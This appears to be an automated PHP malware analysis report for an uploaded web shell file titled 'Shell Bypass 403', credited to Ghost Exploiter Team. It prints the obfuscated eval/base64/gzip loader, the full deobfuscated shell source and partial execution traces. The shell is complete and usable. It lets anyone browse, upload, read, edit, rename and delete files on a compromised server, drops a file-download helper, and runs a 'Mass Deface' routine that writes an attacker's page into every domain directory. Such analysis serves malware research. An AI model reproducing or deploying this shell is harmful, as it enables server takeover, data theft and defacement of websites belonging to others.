PHP Malware Analysis
403.xxx.PhtML
md5: 27cce382e94cc63f8299acf70404c957
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Environment
- getcwd (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- Shell Bypass 403 GE-C666C (Deobfuscated)
URLs
- http://$dir/$nama (Traces)
- http://ghostexploiter.ga/tools/obfusfactor (Deobfuscated, Original)
- https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
//Encrypted at : http://ghostexploiter.ga/tools/obfusfactor
$code = "a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy";
$ghost = "=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";
eval /* PHPDeobfuscator eval output */ {
?><!-- Hak Cipta Ghost Exploiter Team
Thanks All Member GhostExploiterTeam -->
<!DOCTYPE html>
<html>
<head>
<title>Shell Bypass 403 GE-C666C</title>
</head>
<style>
@import url("https://fonts.googleapis.com/css?family=New+Rocker|Shadows+Into+Light&display=swap");
* {
font-family: monospace;
font-weight: 800;
}
body {
font-size: 120%;
color: #fff;
padding: 0;
margin: 25% 10% 10% 10%;
background-color: #111;
text-shadow: rgba(0,0,0,1) 2px 2px 0.1em;
}
table {
margin: auto;
margin-bottom: 20px;
width: 96%;
}
table td {
transition: all .5s;
}
.data-table {
border-collapse: collapse;
font-size: 110%;
min-width: 600px;
}
.data-table th,
.data-table td {
border: none;
padding: 7px 15px;
width: 33%;
}
h3.title{
margin-bottom: 20px;
margin-top: 0px;
text-align: left;
background-color: #f00;
padding: 10px;
font-weight: 900;
font-size: 160%;
font-family: New Rocker;
}
.data-table tbody td {
color: #fff;
background-color: #282828;
}
.data-table tbody td:nth-child(4),
.data-table tbody td:last-child {
text-align: left;
}
.data-table tbody td:first-child{
text-align: left;
}
.data-table tbody tr:nth-child(odd) td {
background-color: #222;
}
.data-table tbody tr:hover td {
background-color: #151515;
border-color: #ccc;
}
.data-table tbody tr.stamp td {
color: #fff;
background-color: #000;
}
.data-table tbody tr.data td.nick {
color: #f00;
}
.kotak{
border: 2px solid #f00;
width: 100%;;
border-radius: 6px;
box-shadow: rgba(0,0,0,1) 3px 3px 5em;
padding-bottom: 10px;
}
.btn{
background-color: #f00;
border-radius: 5px;
border: 2px solid red;
width: 75px;
height: 27px;
font-size: 0.8em;
font-weight: 600;
color: #fff;
outline: none;
margin: 4px;
font-weight: 900;
padding: 2px 3px;
text-shadow: none;
}
.btn:hover{
box-shadow: 0px 0px 2px 2px darkred;
}
a{
color: #fff;
text-decoration: none;
}
a:hover{
color: #fff;
}
.nav_up{
margin: 2%;;
margin-top: 0px;
}
.stamp th{
font-size: 140%;
}
.dirname{
color: #f00;
}
.filename{
color: #fff;
}
input.btn.mini{
width: 35px;
height: 24px;
}
.dirnav{
margin-bottom: 20px;
}
.dirnav a{
color: lime;
}
textarea{
width: 95.5%;
height: 400px;
}
.balik{
margin-right: 200px;
}
.data-table th.det,
.data-table td.det{
width: 25%;
}
.fileinput{
width: 100px;
}
.new{
width: 160px;
}
.newf{
width: 90px;
}
.hide{
display: none;
}
.rmf{
margin-right: -5px;
}
.go{
background-color: green;
border: none;
}
.go:hover{
box-shadow: 0px 0px 2px 2px darkgreen;
}
.fitur{
text-align: right;
margin-top: -15px;
margin-right: 1%;
}
.massarea{
font-size: 60%;
margin: 2%;
}
.mass{
margin-left: 2%;
margin-top: 1%;
margin-right: 2%;
font-size: 60%;
}
.massresult{
margin-top: 8%;
font-size: 80%;
margin-left: 2%;
text-align: left;
}
.inputmass{
text-align: left;
}
.massbt{
font-size: 60%;
}
.massform{
margin-top: 6%;
}
.fbawah,.fatas{
display: inline-block;
}
</style>
<body>
<div class="kotak">
<h3 class="title">Ghost Exploiter Team Official</h3>
<div class="fitur">
<button type="button" class="btn massbt" onclick="display('tabel','massform')">Mass Deface</button>
</div>
<div class="nav_up">
<?php
@ob_clean();
if (isset($_GET['dir'])) {
$dir = $_GET['dir'];
} else {
$dir = getcwd();
}
$dir = str_replace("\\", "/", $dir);
$dirs = explode("/", $dir);
foreach ($dirs as $key => $value) {
if ($value == "" && $key == 0) {
echo "<h3 class=\"dirnav\">Directory >> <a href=\"/\">/</a>";
continue;
}
echo "<a href=\"?dir=";
for ($i = 0; $i <= $key; $i++) {
echo "{$dirs[$i]}";
if ($key !== $i) {
echo "/";
}
}
echo '">' . $value . '</a>/';
}
echo "</h3>";
if (isset($_POST['upl'])) {
$namafile = $_FILES['upload']['name'];
$tempatfile = $_FILES['upload']['tmp_name'];
$tempat = $_GET['dir'];
$error = $_FILES['upload']['error'];
$ukuranfile = $_FILES['upload']['size'];
move_uploaded_file($tempatfile, $dir . '/' . $namafile);
echo "\r\n\t\t\t\t\t<script>alert('file terupload!');</script>\r\n\t\t\t\t\t";
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="upload">
<input type="submit" name="upl" value="Upload">
</form>
</div>
<center>
<!--Mass Deface-->
<?php
echo "\r\n\t<form method='post' class='hide massform' id='massform'>\r\n\t<font color='#f00' size='6px'>Mass Deface Auto Detect Domain</font><br><br><br>\r\n\t\t<div class='inputmass'>\r\n\t\t<input class='mass' type='text' name='pwd' size='50' value='{$dir}'><font color='silver' size='1px'>/*Ubah Ke document_root untuk mass deface*/</font><br>\r\n\t\t<input class='mass' type='text' name='namasc' size='50' placeholder='namafile.ext'><br>\r\n\t\t</div>\r\n\t\t<textarea name='scdeface' width='400px' placeholder='scdeface' class='massarea'></textarea>\r\n\t\t<input type='submit' name='massdef' value='Start' class='btn edt'><br>\r\n\t</form>";
?>
<!--Table-->
<table class="data-table" id="tabel">
<thead>
<tr class="stamp">
<th>File / Folder</th>
<th>Size</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td style="color: lime">.</td>
<td style="color: lime"><center>-</center></td>
<td><center>
<div id="divneww" style="display:none">
<form method="POST">
<input name="createname" class="fileinput new" type="text" size="20" placeholder="nama" required/>
<select name="type">
<option disabled="disabled" selected="selected">type</option>
<option value="file">file</option>
<option value="dir">dir</option>
</select>
<input type="submit" value="Go" class="btn mini go" name="createnew"/>
</form>
</div>
<?php
echo "<div id=\"divnew\"><button class=\"btn newf\" onclick='display(\"divnew\",\"divneww\")'>+File/Dir</button></div>";
?>
</center>
</td>
</tr>
<?php
$scan = scandir($dir);
foreach ($scan as $directory) {
if (!is_dir($dir . '/' . $directory) || $directory == '.' || $directory == '..') {
continue;
}
echo '
<tr class="data">
<td class="det">
<a class="dirname" href="?dir=' . $dir . '/' . $directory . '">' . dirlimit($directory) . '</a>
</td>
<td style="color: red;"><center>--</center></td>
<td>
<center>';
echo '<form method="POST" id="' . clearspace($directory) . '_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="' . $directory . '" required/>
<input type="hidden" name="path" value="' . $dir . '">
<input type="hidden" name="oldname" value="' . $directory . '">
<input type="submit" value="Go" class="btn mini go"/>
</form>';
echo '<div id="' . clearspace($directory) . '_link">
<form method="post">
<input type="hidden" value="' . $dir . '/' . $directory . '" name="dirdl">
<input type="hidden" value="' . $dir . '" name="dirpath">
<input type="submit" value="del" name="rmdir" class="btn mini">';
echo '<a class="btn" href=\'javascript:display("' . clearspace($directory) . '_link","' . clearspace($directory) . '_form");\'>ren</a>';
echo "</form>\r\n\t</div>\r\n\t</center>\r\n\t</td>\r\n\t</tr>\r\n\t";
}
foreach ($scan as $file) {
if (!is_file($dir . '/' . $file)) {
continue;
}
$jumlah = filesize($dir . '/' . $file) / 1024;
$jumlah = round($jumlah, 3);
if ($jumlah >= 1024) {
$jumlah = round($jumlah / 1024, 2) . 'MB';
} else {
$jumlah .= 'KB';
}
echo '
<tr>
<td><a class="filename" href="?dir=' . $dir . '&open=' . $file . '">' . wordlimit($file) . '</a></td>
<td style="color: lime;"><center>' . $jumlah . '</center></td>
<td><center>';
echo '<form method="POST" id="' . clearfile($file) . '_form" class="hide">
<input name="newname" class="fileinput" type="text" size="20" value="' . $file . '" required/>
<input type="hidden" name="path" value="' . $dir . '">
<input type="hidden" name="oldname" value="' . $file . '">
<input type="submit" value="Go" class="btn mini go"/>
</form>';
echo '
<div id="' . clearfile($file) . '_link">
<form method="post" class="fatas">
<input type="hidden" value="' . $dir . '/' . $file . '" name="filedl">
<input type="hidden" value="' . $dir . '" name="filepath">
<input type="submit" value="del" name="rmfile" class="btn mini rmf">
<a href="?dir=' . $dir . '&ubah=' . $file . '" class="btn">edt</a>';
echo '<a class="btn" href=\'javascript:display("' . clearfile($file) . '_link","' . clearfile($file) . '_form");\'>ren</a>';
echo '</form><form action="fdl.php" method="post" class="fbawah">
<input type="hidden" value="' . $dir . '" name="dlpath">
<input type="hidden" value="' . $file . '" name="dlname">
<input type="submit" value="dl" name="dlfile" class="btn mini rmf">
</form></div></center>
</td>
</tr>
';
}
echo "\r\n\t</tbody>\r\n\t</table>\r\n";
/*action*/
if (isset($_GET['open'])) {
echo '
<br />
<style>
table{
display: none;
}
</style>
<textarea>' . htmlspecialchars(file_get_contents($_GET['dir'] . '/' . $_GET['open'])) . '</textarea>
';
}
if (isset($_POST['rmfile'])) {
if (unlink($_POST['filedl'])) {
echo "<script>alert('Delete Ok !');window.location='?dir=" . $_POST['filepath'] . "';</script>";
}
}
if (isset($_POST['rmdir'])) {
$files = glob('' . $_POST['dirdl'] . '/*');
foreach ($files as $file) {
if (is_file($file)) {
unlink($file);
// hapus file
}
}
if (rmdir($_POST['dirdl'])) {
echo "<script>alert('Delete Ok !');window.location='?dir=" . $_POST['dirpath'] . "';</script>";
} else {
echo "<script>alert('err " . $_POST['dirdl'] . "!');</script>";
}
}
if (isset($_GET['ubah'])) {
if (isset($_POST['edit'])) {
$fp = fopen($_POST['object'], 'w');
if (fwrite($fp, $_POST['edit'])) {
echo "<script>alert('Edit Ok !');window.location='?dir=" . $_GET['dir'] . "';</script>";
} else {
err();
}
fclose($fp);
}
$hell = $_GET['dir'];
$yeah = $_GET['ubah'];
$patc = "{$hell}/{$yeah}";
echo '<style>
table {
display: none;
}
</style>
<form method="post" action="">
<input type="hidden" name="object" value="' . $patc . '">
<textarea name="edit">' . htmlspecialchars(file_get_contents($patc)) . '</textarea>
<a href="?dir=' . $dir . '" class="balik"><=Back</a>
<button type="submit" name="go" value="Submit" class="btn edt">Liking</button>
</form>
';
}
if (isset($_POST['newname'])) {
if (rename($_POST['path'] . '/' . $_POST['oldname'], $_POST['path'] . '/' . $_POST['newname'])) {
ok();
} else {
err();
}
}
if (isset($_POST['createnew']) && $_POST['createname'] != '') {
if ($_POST['type'] == 'file') {
$newfl = $dir . '/' . $_POST['createname'];
if (isset($newfl)) {
if (fopen($newfl, 'w')) {
ok();
} else {
err();
}
}
} elseif ($_POST['type'] == 'dir') {
$newdir = $dir . '/' . $_POST['createname'];
if (mkdir($newdir)) {
ok();
} else {
err();
}
} else {
echo "<script>alert('Pilih type !');</script>";
}
}
if (isset($_POST['massdef'])) {
echo "<style>\r\n\t\t\ttable {\r\n\t\t\t\tdisplay: none;\r\n\t\t\t}\r\n\t\t</style>";
$nama = $_POST['namasc'];
$sc = $_POST['scdeface'];
$bikin = fopen($nama, "w");
fwrite($bikin, $sc);
fclose($bikin);
$root = $_POST['pwd'];
$scan = scandir($root);
echo "<div class='massresult'>";
echo "<font color='lime'>[ DETECTED DOMAINS ] : </font><br><br><textarea>";
foreach ($scan as $a) {
$dir = $a;
$full = $root . '/' . $a . '/' . $nama;
$ekse = @copy($nama, $full);
if ($ekse) {
/*filtering dikit :v*/
if (preg_match('/[\\w]+[.]+[a-z]+/i', $dir, $match)) {
echo "http://{$dir}/{$nama}\n";
}
}
}
echo "\n\nNB : Kalo ada dir/domain yang gak terdetect isi sendiri yak :v\nPutra Gans tq</textarea>";
echo "</div>";
}
$fdlvalue = '<?php
$file_url = $_POST["dlpath"]."/".$_POST["dlname"];
header("Content-Type: application/octet-stream");
header("Content-Transfer-Encoding: utf-8");
header("Content-disposition: attachment; filename=\\"" . basename($file_url) . "\\"");
readfile($file_url);
?> ';
$dlwrite = fopen('fdl.php', 'w');
fwrite($dlwrite, $fdlvalue);
fclose($dlwrite);
/*function*/
function wordlimit($file, $limit = 26)
{
if (strlen($file) > $limit) {
$word = mb_substr($file, 0, $limit - 3) . "<font color=#f00>...</font>";
} else {
$word = $file;
}
return $word;
}
function dirlimit($directory, $limit = 22)
{
if (strlen($directory) > $limit) {
$dirlim = mb_substr($directory, 0, $limit - 3) . "<font color=#fff>...</font>";
} else {
$dirlim = $directory;
}
return $dirlim;
}
function ok()
{
echo "<script>alert('Berhasil !');window.location='';</script>";
}
function err()
{
echo "<script>alert('Gagal !');window.location='';</script>";
}
function clearspace($directory)
{
return str_replace(" ", "_", $directory);
}
function clearfile($file)
{
return str_replace(" ", "_", $file);
}
?>
<!--Logger-->
<script type="text/javascript">
function display(hide,show){
document.getElementById(hide).style.display = 'none';
document.getElementById(show).style.display = 'block';
}
</script>
</body>
</html><?php
};
exit;Execution traces
data/traces/27cce382e94cc63f8299acf70404c957_trace-1676239086.3258.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:58:32.223633]
1 0 1 0.000172 393528
1 3 0 0.000384 402456 {main} 1 /var/www/html/uploads/403.xxx.PhtML 0 0
1 A /var/www/html/uploads/403.xxx.PhtML 5 $code = 'a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy'
1 A /var/www/html/uploads/403.xxx.PhtML 5 $ghost = '=8nHY9QB+P0/0nvlvUNNgG0lt+lDmRVvj4D9JhxhidhVmEGpiM7TZVuH6jMkHaO/4jvFyYvCD6tZmHQlOluVocj94ty5S9ULjpaFjs68fqD3Shwb/D18EWyyl+zvXFDZgYr3kJh7p2+ZTwmoA7814kBz6sq2VXzY2DU/z6yXk77SsDVdUX6SqVvRav02KKS8fJy5VaCbRl7TTkgzPoLpnJbCZRRpN5ALZNVLYr0i+IaJH0ToZWt+mOa/SR/UWWvUkK3P0n8o1ixT2QuL7BGJLWCqCaSOkc4T8M/OphHqW8afHboISDjFVKw8h8KzcTxEROe03XHTtXFQwwIYweApUjO9LnOdZoJOWfGmmyNpbPH4NtY3F5wrSteazK6UQJKZhVWuW6trEmRWFEjhgHFjm9sgQGxI1bFFoDjWdOwqDt+cwoEdvkzxAyhc9KjHzNTnc7lD4XyKT7rWcZcPLknEfyAXtabDqTqElFu8hcXR8ZiVguDhoSCL5oAQTfviU5IL'
2 4 0 0.000478 402456 base64_decode 0 /var/www/html/uploads/403.xxx.PhtML 7 1 'a5xYLVjM0UO3t0bXWK8qzVjOzy0oVy0u1lWvysxYy1YsVlJvJSUWp5qZxKekJuenpHcUlxQVpZZ2qKR05BeXdYKBNQBWWRsy'
2 4 1 0.000506 402616
2 4 R 'k�X-X��C��F�X�*�X��-(W-.�U���X�V,VRo%%\026���ħ�&秤w\024�\024\025��v��t�\027�u��5\000VY\0332'
2 5 0 0.000538 402584 str_rot13 0 /var/www/html/uploads/403.xxx.PhtML 7 1 'k�X-X��C��F�X�*�X��-(W-.�U���X�V,VRo%%\026���ħ�&秤w\024�\024\025��v��t�\027�u��5\000VY\0332'
2 5 1 0.000567 402728
2 5 R 'x�K-K��P��S�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i��g�\027�h��5\000IL\0332'
2 6 0 0.000597 402568 gzuncompress 0 /var/www/html/uploads/403.xxx.PhtML 7 1 'x�K-K��P��S�K�*�K��-(J-.�H���K�I,IEb%%\026���ħ�&秤j\024�\024\025��i��g�\027�h��5\000IL\0332'
2 6 1 0.000629 402712
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($ghost))))));'
2 7 0 0.000669 404320 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(gzinflate(base64_decode(strrev($ghost))))));' /var/www/html/uploads/403.xxx.PhtML 7 0
3 8 0 0.000693 404320 strrev 0 /var/www/html/uploads/403.xxx.PhtML(7) : eval()'d code 1 1 '=8nHY9QB+P0/0nvlvUNNgG0lt+lDmRVvj4D9JhxhidhVmEGpiM7TZVuH6jMkHaO/4jvFyYvCD6tZmHQlOluVocj94ty5S9ULjpaFjs68fqD3Shwb/D18EWyyl+zvXFDZgYr3kJh7p2+ZTwmoA7814kBz6sq2VXzY2DU/z6yXk77SsDVdUX6SqVvRav02KKS8fJy5VaCbRl7TTkgzPoLpnJbCZRRpN5ALZNVLYr0i+IaJH0ToZWt+mOa/SR/UWWvUkK3P0n8o1ixT2QuL7BGJLWCqCaSOkc4T8M/OphHqW8afHboISDjFVKw8h8KzcTxEROe03XHTtXFQwwIYweApUjO9LnOdZoJOWfGmmyNpbPH4NtY3F5wrSteazK6UQJKZhVWuW6trEmRWFEjhgHFjm9sgQGxI1bFFoDjWdOwqDt+cwoEdvkzxAyhc9KjHzNTnc7lD4XyKT7rWcZcPLknEfyAXtabDqTqElFu8hcXR8ZiVguDhoSCL5oAQTfviU5IL'
3 8 1 0.000737 412544
3 8 R 'ASAQ3+8BGxDk73icvVttc9s2Ev6szOQ/IDyllBKJlOzYTW1JaRO7uU5f0rmkH27ijAciIYkVRbIkFMVN899vdwGQIEXZyb3FY4sCdheLxe6zC4CZPBgO2d/5mr2IMsnZy1VaSHb5IYvTSIqcvRF8c//emxVP1gX7Lo7Zz2Izh3aiK8mQig2Hs/v38Gfy4OLVizf//PWSreQmhsZJ+Sl4CJ+diYxkLGavVwIkPr/JeFGwJ6Nj9vJy+OL09PTFxFcEwOJrHngs5A21fRttsjSXbJvHPWclZVac+f4iTWThLdN0GQueRYUXpBs/KIpnC76J4pvpL2L3+B9psBb5X69XPEx3xeMfEpk+/ilaruRXYVRkMb+ZFjueOf3z+/cesY+gJwodKgFnbJMmaZHxQJybnp1A5jP2dDSCtk/3783T8KZiLKI/xRkbH40eIkeQxml+xv62WCzwa8bDMEqWZwxZOxueL6PkjB2dPGTjUfmLXXMerJd5uk3CoRExHo+xR4oP'
